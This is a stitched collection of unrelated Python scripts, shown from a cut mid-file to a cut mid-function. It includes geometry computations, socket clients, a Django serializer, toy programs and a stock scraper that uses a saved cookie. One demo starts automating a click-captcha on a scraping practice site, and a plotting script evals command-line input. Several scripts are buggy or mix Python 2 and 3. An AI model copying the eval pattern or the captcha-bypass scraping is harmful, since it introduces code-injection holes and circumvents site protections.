print("NOT 3-cell edge: ",edgeinds,self.adjm[edgeinds],wall)
dstosend.append(self.adjm[edgeinds])
self.wprMFs[i][idd]=getrMF(idd,r,self.wallparams[idd],dstosend)
rtime=time.time()-stt
rtimewprMFs.append(rtime)
def gen_pMF(self,rs,totnum,boundinds,accelerate=False,ptrbound=None):
global rtimesum
self.pMF=np.full((len(rs),totnum,4),np.nan)
if accelerate:
if ptrbound==None:
assert False,"No ptrbound or ptrcellvol given."
st=time.time()
ttt=0
for ir,r in enumerate(rs):
stt=time.time()
contpartind=0
for i in range(totnum):
if i in boundinds:
self.pMF[ir,i,0]=0
self.pMF[ir,i,1]=0
self.pMF[ir,i,2]=0
self.pMF[ir,i,3]=0
continue
stt=time.time()
if accelerate and ptrbound[0][i]>=r:
self.pMF[ir,i,0]=C_chi*r**3
self.pMF[ir,i,1]=C_chi*r**2
self.pMF[ir,i,2]=C_chi*r
self.pMF[ir,i,3]=C_chi
contpartind+=1
continue
if accelerate and ptrbound[1][i]<=r:
self.pMF[ir,i,0]=self.ptrcellvol[i]
self.pMF[ir,i,1]=0
self.pMF[ir,i,2]=0
self.pMF[ir,i,3]=0
contpartind+=1
continue
M0=0
M1=0
M2=0
M3=0
for idd in self.walllists[i]:
addval=self.wprMFs[ir][idd]
M0+=addval[0]
M1+=addval[1]
M2+=addval[1]/r-addval[2]/2.#Non trivial - sign!! divided by two sheels-> 1/2 factor
M3+=addval[1]/r**2-addval[3]/2.+addval[4]/6.#non trivial 1/6 each edge section is accessed 6 times, 2 times per cell
self.pMF[ir,i,0]=M0
self.pMF[ir,i,1]=M1
self.pMF[ir,i,2]=M2
self.pMF[ir,i,3]=M3
contpartind+=1
if contpartind+len(boundinds)!=totnum:
assert False, "Wrong adding"
rtime=time.time()-stt
rtimesum.append(rtime)
def gen_MF(self,MD0):
copiedpMF=np.nan_to_num(self.pMF)#to remove nan indicators
self.MF=np.sum(copiedpMF,axis=1)
self.MFD=self.MF.copy()
for i in range(4):#principal kinematical formula
if i==0:
self.MFD[:,i]=self.MF[:,i]/MD0
if i==1:
self.MFD[:,i]=self.MF[:,i]/MD0
if i==2:
self.MFD[:,i]=self.MF[:,i]/MD0
if i==3:
self.MFD[:,i]=self.MF[:,i]/MD0
print("Total MF generated")
def gen_MF_masked(self,normsize):
copiedpMF=np.nan_to_num(self.pMF)#to remove nan indicators
self.MF=np.sum(copiedpMF,axis=1)
self.MFD=self.MF.copy()
for i in range(4):#principal kinematical formula
self.MFD[:,i]=self.MF[:,i]/normsize**3
def checkcount4(self):
count=0
for _,val in self.edgecounter.items():
if val>3:
count+=1
return count
def plotwall(self,idd,r=None):
fig=plt.figure(figsize=(8,8))
ax=fig.add_subplot(111,aspect="equal")
First=0
for vert in self.wallparams[idd][12][0]:
if First==0:
ax.scatter(*vert.T,s=50,c="green")
First+=1
continue
elif First==1:
ax.scatter(*vert.T,s=25,c="green")
First+=1
continue
ax.scatter(*vert.T,s=1,c="green")
for edge in verttoedges(self.wallparams[idd][12][0]):
ax.plot(*edge.T,lw=1,c="orange")
ax.scatter([0,0],[0,0],s=3,c="red")
if not r==None:
circle1 = plt.Circle([0,0], r, color='red',fill=False)
ax.add_artist(circle1)
PREVALrs=np.array([1.0000000000000002 ,5.0769230769230775 ,9.153846153846155 ,13.230769230769234 ,17.30769230769231 ,21.384615384615387 ,25.461538461538467 ,29.538461538461544 ,33.61538461538462 ,37.6923076923077 ,41.769230769230774 ,45.846153846153854 ,49.923076923076934 ,54.00000000000001 ,58.07692307692309 ,62.15384615384616 ,66.23076923076924 ,70.30769230769232 ,74.3846153846154 ,78.46153846153847 ,82.53846153846155 ,86.61538461538463 ,90.69230769230771 ,94.76923076923079 ,98.84615384615387 ,102.92307692307693 ,107.00000000000001 ,111.0769230769231 ,115.15384615384617 ,119.23076923076925 ,123.30769230769232 ,127.3846153846154 ,131.46153846153848 ,135.53846153846155 ,139.61538461538464 ,143.6923076923077 ,147.7692307692308 ,151.84615384615387 ,155.92307692307693 ,160.00000000000003])
PREVALsig0=np.array([9.30462176053738e-08 ,1.2164382893896889e-05 ,7.11580009464479e-05 ,0.00021366816352618345 ,0.00047339948426560114 ,0.0008784927342966256 ,0.0014492630911988433 ,0.00218903610691815 ,0.0030855998475815155 ,0.004117876422575952 ,0.005250331571820094 ,0.006410840682562735 ,0.007523198493887959 ,0.008516351435331061 ,0.009314483117036997 ,0.00984079546588061 ,0.010064106041359875 ,0.009955977718339285 ,0.009516307085349915 ,0.008784272407092846 ,0.007828170837876977 ,0.0067406857319440155 ,0.005611590573025235 ,0.004519911040650017 ,0.0035241229961765173 ,0.002661674049005517 ,0.0019514477741987815 ,0.0013892386866401335 ,0.0009586740776102773 ,0.0006424760908948394 ,0.0004190694740504398 ,0.0002674488657161619 ,0.00016809828236140587 ,0.00010538962123491593 ,6.723127960685978e-05 ,4.460444384213704e-05 ,3.092263016049216e-05 ,2.201595960806179e-05 ,1.5811746979260698e-05 ,1.1343990423038426e-05])
PREVALsig1=np.array([6.205482265997426e-08 ,1.5964453796324757e-06 ,5.178534591558683e-06 ,1.0721707063632344e-05 ,1.8084354041941446e-05 ,2.7055983864657494e-05 ,3.7245596467963366e-05 ,4.7632405378711977e-05 ,5.805404155886676e-05 ,6.854895537751146e-05 ,7.750427106285083e-05 ,8.424154272426719e-05 ,8.950204693835649e-05 ,9.396238639894009e-05 ,9.754426868844942e-05 ,0.00010147047945357129 ,0.00010519221832255606 ,0.0001111016416550677 ,0.0001175664071604494 ,0.00012295250645925624 ,0.00012462362905966837 ,0.00012120099778592739 ,0.00011310687418981412 ,0.00010123547239255929 ,8.734538311048294e-05 ,7.230024873535402e-05 ,5.730288846404285e-05 ,4.400490801993274e-05 ,3.2798373057837294e-05 ,2.351238500125073e-05 ,1.6219811775974408e-05 ,1.0779697704629692e-05 ,7.071550705881196e-06 ,4.458749748534594e-06 ,2.7497114217189247e-06 ,1.649967683203292e-06 ,1.0301121821781645e-06 ,6.698563309830148e-07 ,4.6583346050687896e-07 ,3.32528592831236e-07])
PREVALsig2=np.array([3.1049734658241755e-08 ,1.578781184586323e-07 ,2.930204442299182e-07 ,4.436663523959398e-07 ,6.350693355299665e-07 ,8.764135617970062e-07 ,1.152498000103475e-06 ,1.4723687712133555e-06 ,1.792300080517532e-06 ,2.0831222543505688e-06 ,2.357229933581647e-06 ,2.5620671392075264e-06 ,2.766214354189731e-06 ,2.8043623209988936e-06 ,2.8803547494717237e-06 ,2.8469831281913246e-06 ,2.8184544131534166e-06 ,2.816877169803228e-06 ,2.6744025653853145e-06 ,2.447635439327259e-06 ,2.1344606672503535e-06 ,1.863428322712351e-06 ,1.6969241289109173e-06 ,1.5763878965798777e-06 ,1.5243877384998714e-06 ,1.398867242324998e-06 ,1.257716178672753e-06 ,1.0404616747478394e-06 ,8.635345595113669e-07 ,6.801082391944476e-07 ,5.163847315459505e-07 ,3.7403457982187703e-07 ,2.5875438814312876e-07 ,1.774648075731325e-07 ,1.196881815491917e-07 ,7.632062375331184e-08 ,4.621024206666922e-08 ,2.7662927906730037e-08 ,1.809344782899971e-08 ,1.2811760195453316e-08])
PREVALsig3=np.array([7.225953663927309e-10 ,8.776091154105139e-09 ,2.0667198888407614e-08 ,3.434099158419224e-08 ,5.3710341601320675e-08 ,6.669689542426629e-08 ,8.495968125143614e-08 ,9.612584899225648e-08 ,1.0498647269978588e-07 ,1.0591133090066566e-07 ,1.1306276448433496e-07 ,1.1075389791870312e-07 ,1.1144771961951519e-07 ,1.1580329598893086e-07 ,1.1411867140064696e-07 ,1.199451065772577e-07 ,1.2416517298034608e-07 ,1.1999724145498257e-07 ,1.0732587318008887e-07 ,1.049280720090045e-07 ,9.55685508380541e-08 ,9.252294272094269e-08 ,7.737807752587672e-08 ,7.050581233003334e-08 ,5.683728323298476e-08 ,4.814726696920971e-08 ,4.086531141604165e-08 ,3.287701261057209e-08 ,2.6783037646764965e-08 ,2.1639817077430443e-08 ,1.6966697888024576e-08 ,1.3402852106480935e-08 ,1.0349915798413502e-08 ,7.026989430110767e-09 ,5.0627635804617635e-09 ,3.737863924645568e-09 ,2.4079666162927574e-09 ,1.5413959406184199e-09 ,8.874062678373296e-10 ,4.5903648646148474e-10])
sigarr0=interpolate.interp1d(PREVALrs,PREVALsig0,bounds_error=False,fill_value="extrapolate")
sigarr1=interpolate.interp1d(PREVALrs,PREVALsig1,bounds_error=False,fill_value="extrapolate")
sigarr2=interpolate.interp1d(PREVALrs,PREVALsig2,bounds_error=False,fill_value="extrapolate")
sigarr3=interpolate.interp1d(PREVALrs,PREVALsig3,bounds_error=False,fill_value="extrapolate")
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 1 13:07:04 2019
@author: Sunny
"""
'''
import socket
#hostname = '127.0.0.1'
#port = 7777
#addr = (hostname,port)
#clientsock = socket.socket() ## 建立一個socket
#clientsock.connect(addr) # 建立連線
def main():
while True:
clientsock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((socket.gethostname(),1234))
say = input("Type something:")
clientsock.send(bytes(say,encoding='gbk')) #傳送訊息
recvdata = clientsock.recv(1024) #接收訊息 recvdata 是bytes形式的
print(str(recvdata,encoding='gbk')) # 我們看不懂bytes,所以轉化為 str
if say =='q' or 'exit':
break
clientsock.close()
if __name__=='__main__':
main()
'''
import select
import socket
HOST = '10.0.0.102'
PORT = 5566
timeout = 60 * 1 # 1 分钟
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall('msg')
# 设置 recv 超时时间
s.setblocking(0)
ready = select.select([s], [], [], timeout)
if ready[0]:
# 接收结果
data = s.recv(1024).strip('\x00')
print(data,repr(data)) |
from django.conf import settings
from rest_framework import serializers, validators
from locations.serializers import LocationSerializer
from .models import PaymentMethod, Truck, TruckImage
class TruckImageSerializer(serializers.ModelSerializer):
class Meta:
model = TruckImage
fields = ("id", "image")
def validate_image(self, value):
if value.size > settings.MAX_IMG_SIZE:
raise serializers.ValidationError("File size too big!")
return value
class TruckSerializer(serializers.ModelSerializer):
location = LocationSerializer(
read_only=True,
)
owner = serializers.PrimaryKeyRelatedField(
read_only=True,
)
name = serializers.CharField(
max_length=50,
validators=[
validators.UniqueValidator(queryset=Truck.confirmed.all())
],
)
images = serializers.SerializerMethodField()
payment_methods = serializers.SerializerMethodField()
class Meta:
model = Truck
fields = (
"id",
"owner",
"name",
"phone",
"email",
"facebook",
"instagram",
"page_url",
"description",
"city",
"payment_methods",
"images",
"updated",
"location",
)
def _get_payments(self, data):
new_payments = []
payments = data.get("payment_methods")
for payment in payments.split(", "):
try:
filtered_payment = PaymentMethod.objects.get(
payment_name__iexact=payment
).id
except PaymentMethod.DoesNotExist:
raise serializers.ValidationError(
"Given payment method does not match"
)
new_payments.append(filtered_payment)
return new_payments
def create(self, validated_data):
data = self.context.get("view").request.data
new_payments = data.get("payment_methods", {})
if new_payments:
new_payments = self._get_payments(data)
truck = Truck.objects.create(**validated_data)
if data.get("image"):
for image_data in data.getlist("image"):
TruckImage.objects.create(truck=truck, image=image_data)
truck.payment_methods.add(*new_payments)
return truck
"""
If an image is sent all previous images will be removed and new images will be associated. The same goes for the payment methods in case of PUT method or PATCH when `payment` is provided. When PATCH without `payment` keyword, old `payment` instances remain.
"""
def update(self, instance, validated_data):
data = self.context.get("view").request.data
method = self.context.get("view").request.method
new_payments = data.get("payment_methods", {})
if new_payments:
new_payments = self._get_payments(data)
if data.get("image"):
images = instance.images.all()
if images.exists():
instance.images.all().delete()
for image_data in data.getlist("image"):
TruckImage.objects.create(truck=instance, image=image_data)
if method in ("PUT", "PATCH") and new_payments:
instance.payment_methods.clear()
instance.payment_methods.add(*new_payments)
return super(TruckSerializer, self).update(instance, validated_data)
def get_images(self, obj):
images = obj.images.all()
return [img.image.url for img in images]
def get_payment_methods(self, obj):
return obj.payment_methods.values_list("payment_name", flat=True)
|
#!/usr/bin/env python3
# -*- coding:UTF-8 -*-
__author__ = 'zachary'
"""
File Name: demo.py
Created Time: 2020-04-11 11:42:57
Last Modified:
"""
import re
from selenium import webdriver
from parsel import Selector
url = 'http://www.porters.vip/captcha/clicks.html'
browser = webdriver.Firefox(executable_path='../geckodriver')
browser.get(url)
sel = Selector(browser.page_source)
# get verify requirement
require = sel.css('#divTips::text').get()
# print(require)
target = re.findall('“(.)”', require)
# print(target)
|
import socket
import datetime
import sys
import os
HOSTNAME = "127.0.0.1"
PORT = 8000
PROTOCOL = 0
TIMEOUT = 15
MAX_SIZE = 1024
QUEUE_SIZE = 5
FILE_A = "GET /a.jpg HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
FILE_B = "GET /b.mp3 HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
FILE_C = "GET /c.txt HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nConnection: keep-alive\r\n\n"
files = [FILE_A, FILE_B, FILE_C]
def make_socket():
try:
sock = socket.socket()
sock.settimeout(TIMEOUT)
except socket.error:
print('socket creation has failed. ')
sys.exit(1)
return sock
def connect(hostname, port):
t1 = datetime.datetime.now()
try:
sock.connect((hostname,port))
except socket.error:
print("connection has been refused. ")
sys.exit(1)
send_data(sock, 'con'.encode())
data = receive_data(sock)
if data != 'con'.encode():
print('connection to server not acknowledged. ')
sys.exit(1)
t2 = datetime.datetime.now()
return (t2-t1).total_seconds()
def send_data(sock, msg):
try:
sock.sendall(msg)
except socket.error:
print(" send message failed.")
sys.exit(1)
def receive_data(sock):
try:
data = sock.recv(MAX_SIZE)
except socket.error:
print(" error in receiving data.")
sys.exit(1)
return data
def retrieve_file(sock, raw_filename, extension):
#Create a file to write to.
filename='retrieve_persistent_' + raw_filename + extension
file = open(filename, 'wb+')
datum = True
count = 0
while datum:
datum = receive_data(sock) #receive data from the socket
if datum == 'fin'.encode() or not datum:
break #if data == 'fin' or data is an empty string, break
file.write(datum)
count += 1
send_data(sock, 'ack'.encode()) #send an acknowledge to the server
file.close()
return count
#main function
if __name__ == "__main__":
total_time = 0
packets_num = 0
sock = make_socket()
t0 = connect(HOSTNAME, PORT)
for file in files:
filename = file.split()[1][1:]
raw_filename, file_ext = os.path.splitext(filename)
t1 = datetime.datetime.now()
# Record time before sending request.
send_data(sock, file.encode()) # Send request to server.
pkt_recn = retrieve_file(sock, raw_filename, file_ext) # Retrieve file, record number of packets received from server.
t2 = datetime.datetime.now()
# Record time after transaction.
time_div = (t2-t1).total_seconds()
print('retrieval time is {} seconds.'.format(time_div)) # Calculated time difference.
total_time += time_div
print('number of packets received = {}\n'.format(pkt_recn)) # Find the number of packets received.
packets_num += pkt_recn
print('total transaction time = {:.6f} seconds.'.format(total_time))
print(' number of packets = {}'.format(packets_num))
sock.close()
sock = None
|
"""
@version 0
@author: Jetse
Quality control:
* Checked whether each column contains at least 8 columns
* Checked whether file contains at least a single SNP
"""
from qualityControl import QualityControlExceptions
class VcfFile:
def __init__(self, fileName, bcf=False):
self.fileName = fileName
self.bcf = bcf
def isValid(self):
print("Checking: " + self.fileName)
lineNo = 0
snps = 0
with open(self.fileName) as vcfReader:
lineNo += 1
for line in vcfReader:
if line.startswith("#"):
continue
elif line.isspace():
continue
snps += 1
columns = line.split()
if len(columns) < 8:
raise QualityControlExceptions.FileFormatException("Too less columns in line {}, at least 8 expected, {} found".format(lineNo, len(columns)))
if snps == 0:
raise QualityControlExceptions.FileFormatException("No SNPs found in vcf file!")
print("{} SNPs found in {}".format(snps,self.fileName)) |
from DG_MMSFunctions import *
from numpy import *
import matplotlib
import matplotlib.pyplot as plt
import sys
functions = []
for arg in sys.argv[1:-1]:
functions.append(arg)
n_rows = int(sys.argv[-1])
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
plt.subplots_adjust(left=None, bottom=None, right=None, top=None,
wspace=0.2, hspace=0.2)
res = 50
X = linspace(0.0, pi, res)
Y = linspace(0.0, pi, res)
x = [0,0]
data = empty([len(functions), res, res])
for z, function in enumerate(functions):
for j, x[0] in enumerate(X):
for i, x[1] in enumerate(Y):
data[z,i,j] = eval(eval(function + "()"))
plt.subplot(n_rows, len(functions)/n_rows + 1, z+1)
CS = plt.contour(X, Y, data[z])
plt.clabel(CS, inline=1, fontsize=10)
plt.title(functions[z])
plt.show()
|
def facebook():
print("Hallo, wat is jou naam?")
naam = input()
print("Welkom", naam, "!")
print("Mogen wij jou wat vragen? Ja/Nee")
vraag = input().lower()
if vraag == "nee":
exit()
if vraag == "ja":
print("Top! Laten we beginnen.")
print(naam, "hoe oud ben jij?")
leeftijd = input()
print("Oke, je bent dus", leeftijd, "Jaar")
print("Waar woon jij?")
woonplaats = input()
print("Heb jij broers of zussen?")
enigskind = input()
print("Wat voor werk doe je?")
werk = input()
print("Oke, leuk dat je", werk, "als werk doet!")
print("Dit was het programma, wil je opnieuw beginnen? ja/nee")
opnieuw = input().lower()
if opnieuw == "ja":
return facebook()
else:
exit()
facebook()
|
known_users=['Alice', 'Bob', 'Claire', 'Dam','Emma']
while True:
print "Hi! My Name is Travis"
name=raw_input("What is your name?:").strip().capitalize()
if name in known_users:
print 'Hello {}!'.format(name)
else:
print 'i dont think i have met you'
|
import glob
import os
from PIL import Image
outdir = 'cropped'
scale = 1.3
BBOX = [600, 176, 1417, 795]
files = glob.glob('./*.png')
for file in files:
print('process %s' % file)
inimage = Image.open(file).crop(BBOX)
width, height = inimage.size
inimage.resize((int(width/scale), int(height/scale)), Image.BILINEAR).save(os.path.join(outdir, os.path.basename(file)))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#上面的注释是用来支持中文,没有就会出错
# 注意 本文件是根据 index.py 复制修改的
# 基本上复用了 index.py 的逻辑,下面是修改的地方
# 1)原来的递归解构没了
# 2)没有数据库相关的操作(所以没有网页版本)
# 3) 命令行参数是需要查询的股票
from __future__ import division
#这个需要先 pip install requests
import requests
import json
import math
import time
import argparse #用来获取命令行参数
import sys
#导入自己写的
import dataBase
import exportFile
import getCookie
import myEmail
import common
import FA
#引入配置
conf = common.loadJsonFile('./config.json')
#头信息
#cookie = getCookie.getCookie('https://xueqiu.com/');
cookie = conf['cookie']
userAgent = conf['userAgent']
#配置
nowTime = str(int(time.time() * 1000));
config = [
'category=SH',
'exchange=',
'areacode=',
'indcode=',
'orderby=symbol',
'order=desc',
'current=ALL',
'pct=ALL',
'pb=0_2', #PB
'pettm=0_20', #PE/TTM
'pelyr=0_20', #PE/LYR
'_='+nowTime,
];
config2 = [
'period=1day',
'type=before',
'_='+nowTime,
];
config3 = [
'_='+nowTime,
];
#行业配置多少钱
industryPrice = 10000;
#接口sleep时间(单位秒)
sleep1 = 0;
sleep2 = 1;
sleep3 = 1;
#需要抓取的数据源
baseUrl = 'https://xueqiu.com/stock';
screenerAPI = baseUrl+'/screener/screen.json'; #检索
stockAPI = baseUrl+'/forchartk/stocklist.json'; #K
stockInfoAPI = 'https://xueqiu.com/v4/stock/quote.json'; #详细
#所有的数据列表
stockArr = []
#处理完成的条数,用来提示进度
dealNum = 0
#是否需要清空数据库重新抓取
isClearOld = False
#数据抓取时间
grabTime = '';
#没有参数的时候的默认查询股票是“平安银行”
symbolCode = 'SZ000001'
#获取命令行参数
if __name__ == '__main__':
try:
argArr = sys.argv
if(len(argArr)>=2):
symbolCode = argArr[1]
except:
sys.exit(0)
#是否清除旧数据
#dataBase.clearOldDatabase(isClearOld);
#股票类
def Stock(name=0, symbol=1,lows=[],percents=[],info={},averagePrecent=0,lastPrecent=0,continueDays=0,continueDaysText='',upOrDownPercent=0,upOrDownContinuePercent=0,halt=False,cashFlow=[],profit=0,nameStr="股票名称"):
return{
"name" : name,
"symbol" : symbol,
"lows" : lows,
"percents" : percents,
"info" : info,
"averagePrecent" : averagePrecent,
"lastPrecent" : lastPrecent,
"continueDays" : continueDays,
"continueDaysText" : continueDaysText,
"upOrDownPercent" : upOrDownPercent,
"upOrDownContinuePercent" : upOrDownContinuePercent,
"halt" : halt,
"cashFlow" : cashFlow,
"profit" : profit,
"nameStr" : nameStr,
}
#解析json
class Payload(object):
def __init__(self, j):
self.__dict__ = json.loads(j)
#获取第N页数据
def getScreenerData(url,config,page):
_headers = {
"User-Agent":userAgent,
"Cookie":cookie
}
_params = "&".join(config);
_params = _params + '&page=' + str(page);
#不要太频
# print '接口1:检索接口,休息一下'
# time.sleep(sleep1);
res = requests.get(url=url,params=_params,headers=_headers)
return res.text;
#递归获取全部数据
def getAllData(page=0,stockArr=[]):
data = {
"count": 1,
"list": [{
"symbol": symbolCode,
"name": symbolCode
}]
}
arr = data["list"];
#在函数中使用全局变量需要这里声明
global dealNum;
# 股票总条数
count = data["count"];
totalPages = int(math.ceil(count/30))
#处理一页中,各个股票的数据
for one in arr:
#用来统计进度
dealNum = dealNum + 1;
perc = round((dealNum/count),3)*100;
name = one['name'];
symbol = one['symbol'];
print('您查询的股票是:'+name)
print('---------------------------------------------------------------------------------------------------------------')
#判断股票是否存在
# cursor = dataBase.getStock(symbol);
# if cursor.count()>=1:
# for document in cursor:
# oneStock = document
# print(name+u' 已经存在数据库中,不再处理')
# print('--------------------------------------------------------------------------------------------------------------- '+str(perc)+'%')
# stockArr.append(oneStock);
# continue
#非常核心的数据提炼部分1
lows = getLowPriceArr(symbol,6); #这里使用第2个接口
#提炼低点占比
percents = getSellPercent(lows);
#提炼低点占比
continueDays = lows[2];
continueDaysText = lows[3];
#提炼最近一天涨跌百分比 和 连续几天的涨跌百分比
upOrDownPercent = lows[4];
upOrDownContinuePercent = lows[5];
#非常核心的数据提炼部分2
info = getStockInfoData(stockInfoAPI,config3,symbol); #这里使用第3个接口
#需要再增加一个key,用来排序
averagePrecent = percents[1];
#需要再增加一个key,用来排序
lastPrecent = percents[0][0];
#新增 停牌信息
halt = info['halt']
#新增 财务分析
cashFlow = FA.parseCfstatementData(symbol)
profit = FA.parseIncstatementData(symbol)
#新增 名字(本来是第一个接口中就有的,因为改了,所以再获取下)
nameStr = info['nameStr']
#完成一个完整的股票分析
oneStock = Stock(
name,
symbol,
lows,
percents,
info,
averagePrecent,
lastPrecent,
continueDays,
continueDaysText,
upOrDownPercent,
upOrDownContinuePercent,
halt,
cashFlow,
profit,
nameStr,
);
#屏幕输出
print(u"【"+oneStock['nameStr']+u"】")
print(oneStock['lows'][3].encode("utf-8") + ',合计涨/跌百分比:'+ str(oneStock['lows'][5]) + '%,当天' + str(oneStock['lows'][4])+ '%')
print('推荐购买' + str(oneStock['info']['buyNum2']) +'('+ str(oneStock['info']['buyNum']) +')')
print('成本为 ' + str(oneStock['info']['buyNum2']*oneStock['lows'][1]) + ' 元(每股 ' + str(oneStock['lows'][1]) +')')
print('【PB/TTM/LYR】'+ str(oneStock['info']['pb']) +'/'+ str(oneStock['info']['pe_ttm'])+'/'+ str(oneStock['info']['pe_lyr']))
print('【EPS/每股净资产/ROE(季)/ROE(年)】'+ str(oneStock['info']['eps']) +'/'+ str(oneStock['info']['net_assets'])+'/'+ str(oneStock['info']['roe']))+ '%/'+ str(oneStock['info']['roe2'])+ '%'
print('N年内低点 ' + str(oneStock['lows'][0]))
print('N年内卖点占比 '+ str(oneStock['percents'][0]) +',平均 '+ str(oneStock['percents'][1]))
print('总股本' + str(oneStock['info']['totalShares2'])+ '亿')
print('最近季度利润' + str(oneStock['profit'][1])+ '亿')
print(oneStock['profit'][0])
print(oneStock['cashFlow'][0])
print(oneStock['cashFlow'][1])
print(oneStock['cashFlow'][2])
print('--------------------------------------------------------------------------------------------------------------- '+str(perc)+'%')
#保存到数据库
#dataBase.save(oneStock);
#并保存到全局对象中(这个其实没啥用呢)
#补充,现在有用了,最后的时候,用来作为全部数据导出到txt
#为什么不是和数据库存入一样,在每一次中完成,而选择了最后一次性处理
#因为主要是为了解决排序的问题
stockArr.append(oneStock);
return stockArr;
#某个股 N年内 每天价格集合
def getStockDetail(url,config,symbol,nYear):
_year = nYear;
_interval = int(_year * 31536000 * 1000);
_end = int(time.time() * 1000); #坑 一定要转成整数,否者后来都会是float类型
_begin = _end - _interval;
_headers = {
"User-Agent":userAgent,
"Cookie":cookie
}
_params = "&".join(config);
_params = _params+'&symbol='+symbol;
_params = _params+'&end='+ str(_end);
_params = _params+'&begin='+ str(_begin);
#print(_params)
#不要太频
# print '接口2:K接口,休息一下('+ str(nYear) +'年内价格处理)'
# time.sleep(sleep2);
try:
#正常的操作
res = requests.get(url=url,params=_params,headers=_headers)
except:
#发生异常,执行这块代码
print '【xm】接口2有点问题哦'
#print res
return res.text;
#该股票第n年内的最低点
def getLowPrice(n,data):
lows = []
myLen=0
_interval = int( (n+1)*31536000*1000 );
_now = int(time.time() * 1000);
_begin = _now - _interval;
for one in data:
# 时间的格式为
# Mon Jun 19 00:00:00 +0800 2017
mytime = one['time']
timestamp = time.mktime( time.strptime(mytime, "%a %b %d %H:%M:%S %Y") )
#扩大1000倍,并转化为整数,方便比较
timestamp = int(timestamp * 1000);
#只处理合理范围内的
if timestamp>= _begin:
low = one['low'];
lows.append(low);
myLen=myLen+1;
if len(lows)==0:
print "该年份没有数据(可能已经停牌了有一年多了...)"
# 伪造一个数据,为了让程序跑通,后期会把价格中有-999的股票都会被过滤~
lows = [-999]
m = sorted(lows)[:1][0]
#这里返回最低点、和总数据条数
#总数据条数 会用来判断,这个股票是否不足六年(比如第4年和第3年数据一样多,说明其实不存在第四年的数据!)
#[最低点,数据条数]
return [m,myLen];
#获取最近连续上涨或下跌的天数(价格按照最近1天到最近第10天顺序)
def getContinuityDay(arr):
#最近10天价格
#print arr
#首先确认是涨势还是跌势,用flag标记
d1 = arr[0]
d2 = arr[1]
flag = 0 #0表示不变,1表示连续涨,-1表示连续跌
if d1>d2:
flag = 1
elif d1<d2:
flag = -1
else:
pass
#统计连续的次数
sum = 0
for i,one in enumerate(arr):
if i==0:
pass
elif flag==1 and arr[i]<arr[i-1]:
sum=sum+1
elif flag==-1 and arr[i]>arr[i-1]:
sum=sum-1
else:
break
return sum
#获取该股票 6年内每天价格数据
def getLowPriceArr(symbol,nYear):
total = nYear
# 获取六年内的全部
# 之前这部分的实现是通过调用六次接口,这里为了减少接口访问频率,其他的年份就需要自己手动从这里提取
stockInfo = getStockDetail(stockAPI,config2,symbol,nYear)
#修改字符串中的数据(删除 '+0800 ')
stockInfo = stockInfo.replace('+0800 ','')
arr = Payload(stockInfo).chartlist
#获取当天的涨跌幅
upOrDownPercent = arr[-1]["percent"];
#令最近一天的收盘价格作为最新价格,来分析用
newClosePrice = arr[-1]["close"];
#1年内~6(N)年内
#把每个股票的低点和处理数据个数存到一个大数组中
arr2 = []
while nYear>0:
low = getLowPrice( total-nYear , arr )
nYear = nYear-1;
arr2.append(low)
arr3 = modData(arr2)
#获取最近(这里只获取10天)连续上涨或下跌的天数
#print(len(arr))
if len(arr) < 10 :
#发现数组长度只有2的情况...查找原因是一只昨天刚上市的新股...
print('警告,这里数据有点问题!可能是一只新股')
lastTenDays = [
0,0,0,0,0,0,0,0,0,0,
]
else:
lastTenDays = [
arr[-1]["close"],
arr[-2]["close"],
arr[-3]["close"],
arr[-4]["close"],
arr[-5]["close"],
arr[-6]["close"],
arr[-7]["close"],
arr[-8]["close"],
arr[-9]["close"],
arr[-10]["close"],
]
continueDays = getContinuityDay(lastTenDays)
continueDaysAbs = abs(continueDays) #绝对值
#中文渲染
continueDaysText = ''
if continueDays>0:
continueDaysText = u'涨'+str(continueDaysAbs)
elif continueDays<0:
continueDaysText = u'跌'+str(continueDaysAbs)
else:
continueDaysText = u'平'
#获取连续的涨跌之和
upOrDownContinuePercent = getUpOrDownPercent(arr,continueDaysAbs)
#提炼数据
return [ arr3, newClosePrice, continueDays,continueDaysText,upOrDownPercent,upOrDownContinuePercent]
#获取连续的涨跌之和
def getUpOrDownPercent(arr,continueDaysAbs):
total = 0
for index in range(continueDaysAbs):
total = total + arr[-1*index-1]["percent"]
return total
#调整数据
#比如有数据为:[[18.91, 241], [18.91, 486], [11.11, 732], [10.51, 732], [9.68, 732], [9.68, 732]];
#从第4年开始数据长度就没有发生改变了,就说明不存在第四年的数据,后面的年份就更加不存在了,要调整数据为:
#调整目标数据为:[[18.91, 241], [18.91, 486], [11.11, 732], [-999, 732], [-999, 732], [-999, 732]]
#进一步提取为:[18.91, 18.91, 11.11, -999, -999, -999]
def modData(arr):
#arr = [[18.91, 241], [18.91, 486], [11.11, 732], [10.51, 732], [9.68, 732], [9.68, 732]];
newArr = [];
length = len(arr);
for i in range(0,length-1):
if arr[i][1]==arr[i+1][1]:
#不存在的年份用-999填空,为何不是0呢?因为0不好区分,这中情况可是正常存在的,包括出现 -4 这样子也是合理的(因为前赋权)
arr[i+1][0] = -999;
for i in range(0,length):
newArr.append(arr[i][0]);
#返回 低点价格数组
return newArr
#获取 各年份卖点占比、平均卖点占比
def getSellPercent(arr):
#低点价格数组
lowArr = arr[0];
#最近一天的收盘价格
price = arr[1];
percentArr = [
round( price/(lowArr[0]*2 ),3),
round( price/(lowArr[1]*2.4),3),
round( price/(lowArr[2]*2.8),3),
round( price/(lowArr[3]*3.2),3),
round( price/(lowArr[4]*3.6),3),
round( price/(lowArr[5]*4 ),3)
]
avg = round( (percentArr[0]+percentArr[1]+percentArr[2]+percentArr[3]+percentArr[4]+percentArr[5])/6 , 3);
#最终输出的最要数据
return [percentArr,avg];
#获取股票的信息(市净率等)
def getStockInfoData(url,config,symbol):
_headers = {
"User-Agent":userAgent,
"Cookie":cookie
}
_params = "&".join(config);
_params = _params + '&code=' + symbol;
#不要太频
# print '接口3:详细接口,休息一下'
# time.sleep(sleep3);
res = requests.get(url=url,params=_params,headers=_headers)
data = json.loads(res.text);
#新增
